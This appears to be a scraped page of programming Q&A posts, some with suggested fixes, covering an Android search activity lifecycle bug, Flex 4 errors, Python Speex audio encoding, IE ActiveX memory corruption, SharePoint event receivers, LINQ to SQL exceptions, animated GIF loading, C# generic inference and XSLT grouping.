    This is the chunk of code in our Search activity's onCreate. A couple of notes about it:

    If the Intent is ACTION_SEARCH (the user typed in their own search and didn't pick a suggestion), we display a list of results, as our Search activity is a ListActivity. In this case, when an item is picked, the Search activity closes, and our parent activity does fire onDestroy() when we back out.

    If the Intent is ACTION_VIEW (the user picked a suggestion) with type "action", we fire off an Intent that creates a new visible activity. In this case, same thing: when we leave that new activity and return to the parent activity, the back key does cause the parent activity to fire onDestroy when leaving.

    If the Intent is ACTION_VIEW (the user picked a suggestion) with type "pitem", that is where the problem lies. It works fine (the method call focuses an item on the parent activity), but when the back button is hit on the parent activity, onDestroy is NOT called. IF, after this executes, I pick an option in the parent activity that fires off another activity, then return to the parent and back out, it will fire onDestroy() in the parent activity. Note that the "action" intent ends up running the exact same method call as "pitem"; it just brings up a new visual activity first. Also, I can take the method call out of "pitem" and just finish(), and the behavior is the same: the parent activity doesn't fire onDestroy() when backed out of.

        if (Intent.ACTION_SEARCH.equals(queryAction)) {
            this.setContentView(_layoutId);
            String searchKeywords = queryIntent.getStringExtra(SearchManager.QUERY);
            init(searchKeywords);
        } else if (Intent.ACTION_VIEW.equals(queryAction)) {
            Bundle bundle = queryIntent.getExtras();
            String key = queryIntent.getDataString();
            String userQuery = bundle.getString(SearchManager.USER_QUERY);
            String[] keyValues = key.split("-");
            if (keyValues.length == 2) {
                String type = keyValues[0];
                String value = keyValues[1];
                if (type.equals("action")) {
                    Intent intent = new Intent(this, EventInfoActivity.class);
                    Long longKey = Long.parseLong(value);
                    intent.putExtra("vo_id", longKey);
                    startActivity(intent);
                    finish();
                } else if (type.equals("pitem")) {
                    Integer id = Integer.parseInt(value);
                    _application._servicesManager._mapHandlerSelector.selectInfoItem(id);
                    finish();
                }
            }
        }

    It just seems like something is being held onto and I can't figure out what it is; in all cases the Search activity fires onDestroy() when finish() is called, so it is definitely going away. If anyone has any suggestions I'd be most appreciative.

    Thanks,
    Sean Overby
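
    One pattern worth trying (a sketch of the standard single-instance search setup, not a confirmed fix for this lifecycle quirk): declare the search activity with android:launchMode="singleTop" in the manifest and route repeat searches through onNewIntent(), so a second search reuses the existing instance instead of stacking on top of the parent:

        @Override
        protected void onNewIntent(Intent intent) {
            super.onNewIntent(intent);
            setIntent(intent);     // replace the stale intent held by this instance
            handleSearch(intent);  // hypothetical helper holding the dispatch logic from onCreate
        }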


  • Adobe Flash Builder (Flex 4): Error #2025, or "addChild() is not available in this class. Instead..."

    - by user306584
    Hi, I'm a complete newbie to Flex, so apologies for my dumbness. I've searched for an answer but haven't found anything that seems to do the trick. What I'm trying to do: port this example, http://www.adobe.com/devnet/air/flex/articles/flex_air_codebase_print.html, to Flash Builder 4. All seems to be fine but for one thing. When I use the original code for the AIR application:

        <?xml version="1.0" encoding="utf-8"?>
        <s:WindowedApplication xmlns:fx="http://ns.adobe.com/mxml/2009"
                               xmlns:s="library://ns.adobe.com/flex/spark"
                               xmlns:mx="library://ns.adobe.com/flex/mx"
                               creationComplete="onApplicationComplete()">
            <fx:Script>
                <![CDATA[
                    private static const neededForCompilation:AirGeneralImplementation = null;

                    private function onApplicationComplete():void {
                        var can:MainCanvas = new MainCanvas();
                        this.addChild(can);
                        can.labelMessage = "Loaded in an AIR Application ";
                    }
                ]]>
            </fx:Script>
            <fx:Declarations>
                <!-- Place non-visual elements (e.g., services, value objects) here -->
            </fx:Declarations>
        </s:WindowedApplication>

    I get this runtime error:

        Error: addChild() is not available in this class. Instead, use addElement() or modify the skin, if you have one.
        at spark.components.supportClasses::SkinnableComponent/addChild()[E:\dev\4.0.0\frameworks\projects\spark\src\spark\components\supportClasses\SkinnableComponent.as:1038]

    If I substitute the code with this.addElement(can); everything loads well, but the first time I press any of the buttons on the main canvas I get the following runtime error:

        ArgumentError: Error #2025: The supplied DisplayObject must be a child of the caller.
        at flash.display::DisplayObjectContainer/getChildIndex()
        at mx.managers::SystemManager/getChildIndex()[E:\dev\4.0.0\frameworks\projects\framework\src\mx\managers\SystemManager.as:1665]
        at mx.managers.systemClasses::ActiveWindowManager/mouseDownHandler()[E:\dev\4.0.0\frameworks\projects\framework\src\mx\managers\systemClasses\ActiveWindowManager.as:437]

    Here's the super-simple code for the main canvas:

        <?xml version="1.0" encoding="utf-8"?>
        <s:Application xmlns:fx="http://ns.adobe.com/mxml/2009"
                       xmlns:s="library://ns.adobe.com/flex/spark"
                       xmlns:mx="library://ns.adobe.com/flex/mx"
                       minWidth="955" minHeight="600"
                       creationComplete="init();">
            <fx:Declarations>
                <!-- Place non-visual elements (e.g., services, value objects) here -->
            </fx:Declarations>
            <fx:Script source="main.as" />
            <mx:Label id="lblMessage" text="The UI from the shared Flex app BothCode" x="433" y="112"/>
            <s:Button x="433" y="141" click="saveFile();" label="Save File"/>
            <s:Button x="601" y="141" click="GeneralFactory.getGeneralInstance().airOnlyFunctionality();" label="Air Only"/>
        </s:Application>

    Any help would be immensely appreciated. And any pointers on how to set up a project that can compile for both AIR and Flash while sharing the same code, all for Flex 4, would also be immensely appreciated. Thank you!
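
    One structural suspicion worth testing (an assumption drawn from the stack trace, not a verified diagnosis): MainCanvas is itself an <s:Application>, and nesting one Application inside a WindowedApplication means two components register with the window-management plumbing that ActiveWindowManager walks on mouseDown. A sketch of the usual restructuring is to make the shared view a plain container:

        <?xml version="1.0" encoding="utf-8"?>
        <!-- MainCanvas as a plain Spark container instead of a nested Application -->
        <s:Group xmlns:fx="http://ns.adobe.com/mxml/2009"
                 xmlns:s="library://ns.adobe.com/flex/spark"
                 xmlns:mx="library://ns.adobe.com/flex/mx"
                 creationComplete="init();">
            <fx:Script source="main.as" />
            <mx:Label id="lblMessage" text="The UI from the shared Flex app BothCode" x="433" y="112"/>
            <s:Button x="433" y="141" click="saveFile();" label="Save File"/>
        </s:Group>

    With that change, this.addElement(can) in the WindowedApplication adds an ordinary child rather than a second application root.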


  • [python] voice communication for python help!

    - by Eric
    Hello! I'm currently trying to write a voice-chat program in Python. All tips/tricks are welcome. So far I found pyAudio, a wrapper of PortAudio. I played around with that and got an input stream from my microphone played back to my speakers, raw audio only, of course. But I can't send raw data over the network (due to the size, duh), so I'm looking for a way to encode it. I searched around the 'net and stumbled over a speex wrapper for Python. It seemed too good to be true, and believe me, it was.

    You see, in pyAudio you can set the size of the chunks you want to take from your input audio buffer, and in that sample code it's set to 320. Then when a chunk is encoded, it's ~40 bytes of data, which is fairly acceptable, I guess.

    And now for the problem. I start a sample program which just takes the input stream, encodes the chunks, decodes them, and plays them (not sending anything over the network, since I'm testing). If I just let my computer idle and run this program, it works great, but as soon as I do something, e.g. start Firefox, the audio input buffer gets all clogged up! It just grows, and then it all crashes and gives me an overflow error on the buffer.

    OK, so why am I taking only 320 bytes off the stream? I could just take 1024 bytes or something, which would ease the pressure on the buffer. BUT: if I give speex 1024 bytes of data to encode/decode, it either crashes and says that's too big for its buffer, OR it encodes/decodes it, but the sound is very noisy and "choppy", as if it only encoded a tiny bit of that 1024-byte chunk and the rest is static noise. So the sound is like a helicopter, lol.

    I did some research, and it seems that speex can only convert 320 bytes of data at a time, well, 640 for wideband. But that's the standard? How can I fix this problem? How should I structure my program to work with speex? I could use a middle buffer that takes all available data from the input buffer, then chunks it up into 320-byte pieces and encodes/decodes them. But that takes a bit longer and seems like a very bad solution to the problem. Because, as far as I know, there's no other encoder for Python that compresses audio so it can be sent over the network in acceptably small packages, or is there? I've been googling for three days now. Also, there is the pyMedia library; I don't know if it's a good fit for converting to mp3/ogg for this kind of software.

    Thanks in advance for reading this; I hope someone can help me! (:
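
    For what it's worth, the "middle buffer" idea dismissed above is the conventional fix: capture in whatever chunk size keeps the device happy, then slice into exact Speex-sized frames before encoding. A sketch (assumptions: 16-bit mono PCM and the 320-byte frame the wrapper expects; encoder.encode is the wrapper's call):

        class FrameBuffer:
            """Slice an arbitrary PCM byte stream into fixed-size Speex frames."""
            FRAME_BYTES = 320  # speex narrowband frame, 16-bit mono

            def __init__(self):
                self._buf = bytearray()

            def push(self, raw):
                """Add raw PCM bytes; return the complete frames now available."""
                self._buf.extend(raw)
                frames = []
                while len(self._buf) >= self.FRAME_BYTES:
                    frames.append(bytes(self._buf[:self.FRAME_BYTES]))
                    del self._buf[:self.FRAME_BYTES]
                return frames

        # inside the capture loop (stream and encoder objects assumed):
        #   for frame in framer.push(stream.read(1024)):
        #       packet = encoder.encode(frame)   # hypothetical wrapper call
        #       # send packet over the network here

    Reading larger chunks off the device while feeding the codec exact frames is what keeps the input buffer from clogging under load.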


  • IE attachEvent on object tag causes memory corruption

    - by larswa
    I have an ActiveX control within an embedded IE8 HTML page that has the following event: MessageReceived([in] BSTR srcWindowId, [in] BSTR json). On Windows, the event is registered with OCX.attachEvent("MessageReceived", onMessageReceivedFunc). The following code fires the event in the HTML page:

        HRESULT Fire_MessageReceived(BSTR id, BSTR json)
        {
            CComVariant varResult;
            T* pT = static_cast<T*>(this);
            int nConnectionIndex;
            CComVariant* pvars = new CComVariant[2];
            int nConnections = m_vec.GetSize();

            for (nConnectionIndex = 0; nConnectionIndex < nConnections; nConnectionIndex++)
            {
                pT->Lock();
                CComPtr<IUnknown> sp = m_vec.GetAt(nConnectionIndex);
                pT->Unlock();
                IDispatch* pDispatch = reinterpret_cast<IDispatch*>(sp.p);
                if (pDispatch != NULL)
                {
                    VariantClear(&varResult);
                    pvars[1] = id;
                    pvars[0] = json;
                    DISPPARAMS disp = { pvars, NULL, 2, 0 };
                    pDispatch->Invoke(0x1, IID_NULL, LOCALE_USER_DEFAULT,
                                      DISPATCH_METHOD, &disp, &varResult, NULL, NULL);
                }
            }
            delete[] pvars; // -> memory corruption here!
            return varResult.scode;
        }

    After I enabled gflags.exe with Application Verifier, the following strange behaviour occurred: after Invoke(), which executes the JavaScript callback, the BSTR from pvars[1] is copied into pvars[0] for some unknown reason!? The delete[] of pvars then causes a double free of the same string, which ends in a heap corruption. Does anybody have an idea what's going on here? Is this an IE bug, or is there a trick within the OCX implementation that I'm missing?

    If I use the tag like this, the strange copy operation does not occur:

        <script for="OCX" event="MessageReceived(id, json)" language="JavaScript" type="text/javascript">
            window.onMessageReceivedFunc(windowId, json);
        </script>

    The following code also seems to be OK, given that the caller of Fire_MessageReceived() is responsible for freeing the BSTRs:

        HRESULT Fire_MessageReceived(BSTR srcWindowId, BSTR json)
        {
            CComVariant varResult;
            T* pT = static_cast<T*>(this);
            int nConnectionIndex;
            VARIANT pvars[2];
            int nConnections = m_vec.GetSize();

            for (nConnectionIndex = 0; nConnectionIndex < nConnections; nConnectionIndex++)
            {
                pT->Lock();
                CComPtr<IUnknown> sp = m_vec.GetAt(nConnectionIndex);
                pT->Unlock();
                IDispatch* pDispatch = reinterpret_cast<IDispatch*>(sp.p);
                if (pDispatch != NULL)
                {
                    VariantClear(&varResult);
                    pvars[1].vt = VT_BSTR;
                    pvars[1].bstrVal = srcWindowId;
                    pvars[0].vt = VT_BSTR;
                    pvars[0].bstrVal = json;
                    DISPPARAMS disp = { pvars, NULL, 2, 0 };
                    pDispatch->Invoke(0x1, IID_NULL, LOCALE_USER_DEFAULT,
                                      DISPATCH_METHOD, &disp, &varResult, NULL, NULL);
                }
            }
            // pvars is stack-allocated here, so there is nothing to delete
            return varResult.scode;
        }

    Thanks!
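
    A hedged observation based on standard COM ownership rules rather than anything IE-specific: the rgvarg array handed over in DISPPARAMS stays caller-owned, and the callee is allowed to scribble on those VARIANTs, so a defensive variant is to give each Invoke per-call copies and neutralize the observed aliasing before cleanup:

        // per-call copies plus an aliasing guard before cleanup (sketch)
        VARIANT args[2];
        args[1].vt = VT_BSTR;  args[1].bstrVal = ::SysAllocString(id);
        args[0].vt = VT_BSTR;  args[0].bstrVal = ::SysAllocString(json);
        DISPPARAMS disp = { args, NULL, 2, 0 };
        pDispatch->Invoke(0x1, IID_NULL, LOCALE_USER_DEFAULT,
                          DISPATCH_METHOD, &disp, &varResult, NULL, NULL);
        if (args[0].bstrVal == args[1].bstrVal)  // the reported post-Invoke aliasing
            VariantInit(&args[0]);               // drop the alias without freeing it
        VariantClear(&args[0]);
        VariantClear(&args[1]);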


  • Event receiver on Content Type not triggered on WikiPageLibrary

    - by Ciprian Grosu
    Hello all, I created a new content type for a wiki page library. I added this content type to the library through code (the UI did not allow it). Next, I added an event receiver to this content type (on ItemAdded and ItemAdding). My problem is that no event is triggered. If I add these events directly to the wiki page library, all works fine. Is there a limitation/bug/trick?

    I looked at the content type attached to the library with SharePoint Manager, and in its schema the part for the event receivers is missing... I know there should be something like:

        <XmlDocuments>
            <XmlDocument NamespaceURI="http://schemas.microsoft.com/sharepoint/events">
                <spe:Receivers xmlns:spe="http://schemas.microsoft.com/sharepoint/events">
                    <Receiver>
                        <Name> </Name>
                        <Type>1</Type>
                        <SequenceNumber>10000</SequenceNumber>
                        <Assembly>RssFeedWP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=f6722cbeba696def</Assembly>
                        <Class>RssFeedWP.ItemEventReceiver</Class>
                        <Data> </Data>
                        <Filter> </Filter>
                    </Receiver>
                    <Receiver>
                        <Name> </Name>
                        <Type>10001</Type>
                        <SequenceNumber>10000</SequenceNumber>
                        <Assembly>RssFeedWP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=f6722cbeba696def</Assembly>
                        <Class>RssFeedWP.ItemEventReceiver</Class>
                        <Data> </Data>
                        <Filter> </Filter>
                    </Receiver>
                </spe:Receivers>
            </XmlDocument>
        </XmlDocuments>

    If I look with SPM at the content type added to the site, I do see this part in the schema. Here is my code:

        public override void FeatureActivated(SPFeatureReceiverProperties properties)
        {
            using (SPWeb web = (SPWeb)properties.Feature.Parent)
            {
                // create RssWiki content type
                SPContentType rssFeedContentType = new SPContentType(
                    web.AvailableContentTypes["Wiki Page"], web.ContentTypes, "RssFeed Wiki Page");

                // add rssfeed url field to the new content type
                AddFieldToContentType(web, rssFeedContentType, "RssFeed Url", SPFieldType.Note);
                // add use xslt check box field to the new content type
                AddFieldToContentType(web, rssFeedContentType, "Use Xslt", SPFieldType.Boolean);
                // add xslt url field to the new content type
                AddFieldToContentType(web, rssFeedContentType, "Xslt Url", SPFieldType.Note);

                web.ContentTypes.Add(rssFeedContentType);
                rssFeedContentType.Update();
                web.Update();

                AddContentTypeToList(web, rssFeedContentType);
                AddEventReceiversToCT(rssFeedContentType);
                //AddEventReceiverToList(web);
            }
        }

        private void AddFieldToContentType(SPWeb web, SPContentType ct, string fieldName, SPFieldType fieldType)
        {
            SPField rssUrlField = null;
            try
            {
                rssUrlField = web.Fields.GetField(fieldName);
            }
            catch (Exception ex)
            {
                if (rssUrlField == null)
                {
                    web.Fields.Add(fieldName, fieldType, false);
                }
            }
            SPFieldLink rssUrlFieldLink = new SPFieldLink(web.Fields[fieldName]);
            ct.FieldLinks.Add(rssUrlFieldLink);
        }

        private static void AddContentTypeToList(SPWeb web, SPContentType ct)
        {
            SPList wikiList = web.Lists[listName];
            wikiList.ContentTypesEnabled = true;
            wikiList.ContentTypes.Add(ct);
            wikiList.Update();
        }

        private static void AddEventReceiversToCT(SPContentType ct)
        {
            // add event receivers
            string assemblyName = System.Reflection.Assembly.GetExecutingAssembly().FullName;
            string ctReceiverName = "RssFeedWP.ItemEventReceiver";
            ct.EventReceivers.Add(SPEventReceiverType.ItemAdding, assemblyName, ctReceiverName);
            ct.EventReceivers.Add(SPEventReceiverType.ItemAdded, assemblyName, ctReceiverName);
            ct.Update();
        }

    Thx!
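
    One ordering detail that may explain this (an assumption about SPList.ContentTypes.Add semantics, not a verified answer): the list receives a child copy of the content type at the moment it is attached, so receivers registered on the site content type afterwards never reach that copy unless the change is pushed down. A sketch of both remedies:

        // either register receivers BEFORE attaching the content type to the list...
        AddEventReceiversToCT(rssFeedContentType);
        AddContentTypeToList(web, rssFeedContentType);

        // ...or push later changes down to child (list-level) content types:
        rssFeedContentType.Update(true);   // true = propagate to children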


  • Linq to SQL NullReferenceExceptions: A random needle in a haystack!

    - by Shane
    I'm getting NullReferenceExceptions at seemingly random times in my application and can't track down what could be causing the error. I'll do my best to describe the scenario and setup. Any and all suggestions greatly appreciated!

    C# .NET 3.5 Web Forms application, but I use the WebFormRouting library built by Phil Haack (http://haacked.com/archive/2008/03/11/using-routing-with-webforms.aspx) to leverage the routing libraries of .NET (usually used in conjunction with MVC) instead of using URL rewriting for my URLs.

    My database has 60 tables, all normalized. It's just a massive application. (SQL Server 2008.)

    All queries are built with LINQ to SQL in code (no stored procedures). Each time, a new instance of my data context is created. I use only one data context, with all relationships defined in four relationship diagrams in SQL Server. The data context gets created a lot. I've heard arguments on both sides about whether you should let the data context be closed automatically or do it yourself; in this case I do it myself. It doesn't seem to matter whether I'm creating a lot of instances of the data context or just one.

    For example, I've got a vote-up button with the following code, and it errors maybe 1 in 10-20 times:

        protected void VoteUpLinkButton_Click(object sender, EventArgs e)
        {
            DatabaseDataContext db = new DatabaseDataContext();

            StoryVote storyVote = new StoryVote();
            storyVote.StoryId = storyId;
            storyVote.UserId = Utility.GetUserId(Context);
            storyVote.IPAddress = Utility.GetUserIPAddress();
            storyVote.CreatedDate = DateTime.Now;
            storyVote.IsDeleted = false;
            db.StoryVotes.InsertOnSubmit(storyVote);
            db.SubmitChanges();

            // If this story is not yet published, check to see if we should publish it.
            // Make sure that it is already approved.
            if (story.PublishedDate == null && story.ApprovedDate != null)
            {
                Utility.MakeUpcommingNewsPopular(storyId);
            }

            // Refresh our page.
            Response.Redirect("/news/" + category.UniqueName + "/"
                + RouteData.Values["year"].ToString() + "/"
                + RouteData.Values["month"].ToString() + "/"
                + RouteData.Values["day"].ToString() + "/"
                + RouteData.Values["uniquename"].ToString());
        }

    The last thing I tried was the "Auto Close" flag setting on SQL Server. This was set to true and I changed it to false. That doesn't seem to have done the trick, although it has had a good overall effect.

    Here's a detailed trace that wasn't caught. I also get slightly different errors when caught by my try/catches:

        System.Web.HttpUnhandledException: Exception of type 'System.Web.HttpUnhandledException' was thrown. ---> System.NullReferenceException: Object reference not set to an instance of an object.
        at System.Web.Util.StringUtil.GetStringHashCode(String s)
        at System.Web.UI.ClientScriptManager.EnsureEventValidationFieldLoaded()
        at System.Web.UI.ClientScriptManager.ValidateEvent(String uniqueId, String argument)
        at System.Web.UI.WebControls.TextBox.LoadPostData(String postDataKey, NameValueCollection postCollection)
        at System.Web.UI.Page.ProcessPostData(NameValueCollection postData, Boolean fBeforeLoad)
        at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
        --- End of inner exception stack trace ---
        at System.Web.UI.Page.HandleError(Exception e)
        at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
        at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
        at System.Web.UI.Page.ProcessRequest()
        at System.Web.UI.Page.ProcessRequest(HttpContext context)
        at ASP.forms_news_detail_aspx.ProcessRequest(HttpContext context)
        at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
        at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)

    HELP!!!
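
    A hedged reading of that trace: it dies inside ClientScriptManager.EnsureEventValidationFieldLoaded while processing the postback, i.e. in ASP.NET event validation, before any LINQ to SQL code runs. Two things worth trying, sketched below (the page directive is a diagnostic step, not a recommended permanent setting):

        // deterministically dispose the context rather than leaving it to the GC
        using (DatabaseDataContext db = new DatabaseDataContext())
        {
            StoryVote storyVote = new StoryVote();
            // ... populate fields as above ...
            db.StoryVotes.InsertOnSubmit(storyVote);
            db.SubmitChanges();
        }

        // and, purely to rule event validation in or out on the failing page:
        // <%@ Page EnableEventValidation="false" ... %>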


  • Animated background image in a hidden <div> doesn't load, or loads without animation

    - by Guanche
    Hello, I have spent the whole day trying to make a script which, on submit, hides the form and shows a hidden <div> with an animated progress bar. The problem is that Internet Explorer doesn't show animated GIF images in hidden divs; the images are static. I visited many websites and found a script which uses:

        document.getElementById(id).style.backgroundImage = 'url(/images/load.gif)';

    Finally, my script works in Internet Explorer, Firefox, Opera, but... Google Chrome doesn't display the image at all; I see only the div text. After many tests I discovered the following: the only way to see the background image in Google Chrome is to include the same image somewhere else in the page (outside the hidden div) with 1px dimensions:

        <img src="/images/load.gif" width="1" height="1" />

    This did the trick, but... after this dirty solution, Internet Explorer for some reason shows the image as static again. So my question is: is there any way to force Google Chrome to show the image? Thanks.

    This is my script:

        <script language="JavaScript" type="text/javascript">
        function ver(id, elementId) {
            if (document.getElementById('espera').style.visibility == "visible") {
                return false;
            } else {
                var esplit = document.forms[0]['userfile'].value.split(".");
                ext = esplit[esplit.length - 1];
                if (document.forms[0]['userfile'].value == '') {
                    alert('Please select a file');
                    return false;
                } else {
                    if ((ext.toLowerCase() == 'jpg')) {
                        document.getElementById(id).style.position = 'absolute';
                        document.getElementById(id).style.display = 'inline';
                        document.getElementById(id).style.visibility = "visible";
                        document.getElementById(id).style.backgroundImage = 'url(/images/load.gif)';
                        document.getElementById(id).style.height = "100px";
                        document.getElementById(id).style.backgroundColor = '#f3f3f3';
                        document.getElementById(id).style.backgroundRepeat = "no-repeat";
                        document.getElementById(id).style.backgroundPosition = "50% 50%";
                        var element;
                        if (document.all)
                            element = document.all[elementId];
                        else if (document.getElementById)
                            element = document.getElementById(elementId);
                        if (element && element.style)
                            element.style.display = 'none';
                        return true;
                    } else {
                        alert('This is not a jpg file');
                        return false;
                    }
                }
            }
        }
        </script>

        <div id="frmDiv">
            <form enctype="multipart/form-data" action="/upload.php" method="post"
                  name="upload3" onsubmit="return ver('espera','frmDiv');">
                <input type="hidden" name="max_file_size" value="4194304" />
                <table border="0" cellspacing="1" cellpadding="2" width="100%">
                    <tr bgcolor="#f5f5f5">
                        <td>File (jpg)</td>
                        <td><input type="file" name="userfile" class="upf" /></td>
                    </tr>
                    <tr bgcolor="#f5f5f5">
                        <td>&nbsp;</td>
                        <td><input class="upf2" type="submit" name="add" value="Upload" /></td>
                    </tr>
                </table>
            </form>
        </div>
        <div id="espera" style="display:none;text-align:center;float:left;width:753px;">
            &nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />
            Please wait...<br />&nbsp;
        </div>
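
    A lighter variant of the 1x1-image workaround (a sketch of the same idea, minus the visible element) is to warm the browser's cache from script, so nothing extra appears in the layout that might re-trigger the IE static-GIF quirk:

        // run once at page load; no visible <img> needed
        var spinnerPreload = new Image();
        spinnerPreload.src = '/images/load.gif';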


  • Partial generic type inference possible in C#?

    - by Lasse V. Karlsen
    I am working on rewriting my fluent interface for my IoC class library, and when I refactored some code in order to share some common functionality through a base class, I hit upon a snag.

    Note: This is something I want to do, not something I have to do. If I have to make do with a different syntax, I will, but if anyone has an idea on how to make my code compile the way I want it, it would be most welcome.

    I want some extension methods to be available for a specific base class, and these methods should be generic, with one generic type related to an argument to the method, but the methods should also return a specific type related to the particular descendant they're invoked upon. Better with a code example than the above description, methinks. Here's a simple and complete example of what doesn't work:

        using System;

        namespace ConsoleApplication16
        {
            public class ParameterizedRegistrationBase { }

            public class ConcreteTypeRegistration : ParameterizedRegistrationBase
            {
                public void SomethingConcrete() { }
            }

            public class DelegateRegistration : ParameterizedRegistrationBase
            {
                public void SomethingDelegated() { }
            }

            public static class Extensions
            {
                public static ParameterizedRegistrationBase Parameter<T>(
                    this ParameterizedRegistrationBase p, string name, T value)
                {
                    return p;
                }
            }

            class Program
            {
                static void Main(string[] args)
                {
                    ConcreteTypeRegistration ct = new ConcreteTypeRegistration();
                    ct
                        .Parameter<int>("age", 20)
                        .SomethingConcrete(); // <-- this is not available

                    DelegateRegistration del = new DelegateRegistration();
                    del
                        .Parameter<int>("age", 20)
                        .SomethingDelegated(); // <-- neither is this
                }
            }
        }

    If you compile this, you'll get:

        'ConsoleApplication16.ParameterizedRegistrationBase' does not contain a definition for 'SomethingConcrete' and no extension method 'SomethingConcrete'...
        'ConsoleApplication16.ParameterizedRegistrationBase' does not contain a definition for 'SomethingDelegated' and no extension method 'SomethingDelegated'...

    What I want is for the extension method (Parameter<T>) to be able to be invoked on both ConcreteTypeRegistration and DelegateRegistration, and in both cases the return type should match the type the extension was invoked on. The problem is as follows: I would like to write

        ct.Parameter<string>("name", "Lasse")
                    ^------^
                    notice only one generic argument

    but also have Parameter<T> return an object of the same type it was invoked on, which means:

        ct.Parameter<string>("name", "Lasse").SomethingConcrete();
        ^                                     ^-------+-------^
        |                                             |
        +---------------------------------------------+
          .SomethingConcrete comes from the object in "ct",
          which in this case is of type ConcreteTypeRegistration

    Is there any way I can trick the compiler into making this leap for me? If I add two generic type arguments to the Parameter method, type inference forces me to either provide both or none, which means this:

        public static TReg Parameter<TReg, T>(
            this TReg p, string name, T value)
            where TReg : ParameterizedRegistrationBase

    gives me this:

        Using the generic method 'ConsoleApplication16.Extensions.Parameter<TReg,T>(TReg, string, T)' requires 2 type arguments
        Using the generic method 'ConsoleApplication16.Extensions.Parameter<TReg,T>(TReg, string, T)' requires 2 type arguments

    which is just as bad. I can easily restructure the classes, or even make the methods non-extension-methods by introducing them into the hierarchy, but my question is if I can avoid having to duplicate the methods for the two descendants, and in some way declare them only once, for the base class.

    Let me rephrase that. Is there a way to change the classes in the first code example above, so that the syntax in the Main method can be kept, without duplicating the methods in question? The code will have to be compatible with both C# 3.0 and 4.0.

    Edit: The reason I'd rather not leave both generic type arguments to inference is that for some services, I want to specify a parameter value for a constructor parameter that is of one type, but pass in a value that is a descendant. For the moment, matching of specified argument values and the correct constructor to call is done using both the name and the type of the argument. Let me give an example:

        ServiceContainerBuilder.Register<ISomeService>(r => r
            .From(f => f.ConcreteType<FileService>(ct => ct
                .Parameter<Stream>("source", new FileStream(...)))));
                          ^--+---^           ^---+----^
                             |                   |
                             |                   +- has to be a descendant of Stream
                             |
                             +- has to match constructor of FileService

    If I leave both to type inference, the parameter type will be FileStream, not Stream.
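
    For completeness, the usual workaround when inference is all-or-nothing is to split the call so each step fixes one type parameter; the ParamSetter type below is invented for illustration and is not part of the library above:

        public static class SplitExtensions
        {
            // TReg is inferred from the receiver; no explicit type arguments needed here
            public static ParamSetter<TReg> Parameter<TReg>(this TReg p, string name)
                where TReg : ParameterizedRegistrationBase
            {
                return new ParamSetter<TReg>(p, name);
            }
        }

        public class ParamSetter<TReg> where TReg : ParameterizedRegistrationBase
        {
            private readonly TReg _target;
            private readonly string _name;

            public ParamSetter(TReg target, string name)
            {
                _target = target;
                _name = name;
            }

            // T is stated explicitly in the second step
            public TReg Value<T>(T value)
            {
                // record (_name, typeof(T), value) on _target here
                return _target; // TReg flows through, so the chain keeps its concrete type
            }
        }

        // usage:
        //   ct.Parameter("age").Value<int>(20).SomethingConcrete();
        //   ct.Parameter("source").Value<Stream>(fileStream); // Stream, not FileStream

    The cost is one extra call in the chain; the gain is that TReg stays inferred while T stays explicit.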


  • XSLT transformation by grouping based on 3 elements/attributes

    - by Daniel
    This question is related to http://stackoverflow.com/questions/2863202/xslt-1-0-grouping-to-reformat-element-defined-by-date-into-element-defined-by-tas, just to understand more clearly the trick behind it. How would the XSLT look if we were to group by date, task and shift, as below?

    Input XML:

        <Person>
            <name>John</name>
            <date>June12</date>
            <shift tier="1">
                <workTime taskID="1">34</workTime>
                <workTime taskID="2">12</workTime>
            </shift>
            <shift tier="2">
                <workTime taskID="1">3</workTime>
            </shift>
        </Person>
        <Person>
            <name>John</name>
            <date>June13</date>
            <shift tier="1">
                <workTime taskID="1">21</workTime>
                <workTime taskID="2">11</workTime>
            </shift>
            <shift tier="2">
                <workTime taskID="1">2</workTime>
            </shift>
        </Person>

    and similarly, the output would be:

        <Person>
            <name>John</name>
            <tier>1</tier>
            <taskID>1</taskID>
            <workTime>
                <date>June12</date>
                <time>34</time>
            </workTime>
            <workTime>
                <date>June13</date>
                <time>21</time>
            </workTime>
        </Person>
        <Person>
            <name>John</name>
            <tier>1</tier>
            <taskID>2</taskID>
            <workTime>
                <date>June12</date>
                <time>12</time>
            </workTime>
            <workTime>
                <date>June13</date>
                <time>11</time>
            </workTime>
        </Person>
        <Person>
            <name>John</name>
            <tier>2</tier>
            <taskID>1</taskID>
            <workTime>
                <date>June12</date>
                <time>3</time>
            </workTime>
            <workTime>
                <date>June13</date>
                <time>2</time>
            </workTime>
        </Person>
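
    A sketch of the Muenchian-grouping answer for the three-part key (assumptions: a single root element wraps the Person list, as required for well-formed XML; untested against the exact sample above):

        <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
            <!-- one key entry per (person, tier, task) combination -->
            <xsl:key name="kByPersonTierTask" match="workTime"
                     use="concat(../../name, '|', ../@tier, '|', @taskID)"/>

            <xsl:template match="/">
                <!-- visit only the first workTime of each group, in document order -->
                <xsl:for-each select="//workTime[generate-id() =
                        generate-id(key('kByPersonTierTask',
                            concat(../../name, '|', ../@tier, '|', @taskID))[1])]">
                    <Person>
                        <name><xsl:value-of select="../../name"/></name>
                        <tier><xsl:value-of select="../@tier"/></tier>
                        <taskID><xsl:value-of select="@taskID"/></taskID>
                        <!-- then emit one workTime per group member, carrying its date -->
                        <xsl:for-each select="key('kByPersonTierTask',
                                concat(../../name, '|', ../@tier, '|', @taskID))">
                            <workTime>
                                <date><xsl:value-of select="../../date"/></date>
                                <time><xsl:value-of select="."/></time>
                            </workTime>
                        </xsl:for-each>
                    </Person>
                </xsl:for-each>
            </xsl:template>
        </xsl:stylesheet>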

    Read the article

  • Search Form in Responsive Design - Remove Search button on Mobile

    - by Kevin
